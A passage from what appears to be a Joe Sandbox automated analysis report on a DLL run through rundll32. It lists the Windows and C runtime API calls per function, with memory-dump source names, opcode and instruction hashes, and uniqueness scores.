                                                                                                                      • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                      • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                      • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                      • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                      • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                      • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                      • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      • Opcode ID: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction ID: 7ba363369691fc6b3f3751fa7a143ae8cdd8f79096e01733c6a63758ec2ecc69
                                                                                                                      • Opcode Fuzzy Hash: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction Fuzzy Hash: A601C072500219FBEB00DF648D85FAF73BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                      • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                      • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                      • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                      • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                      • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                      • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                      • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(023D1520), ref: 1003A5C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
                                                                                                                      • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                      • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,C5005C0B), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,C5005C0B), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,C5005C0B), ref: 1001DCDB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                      • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
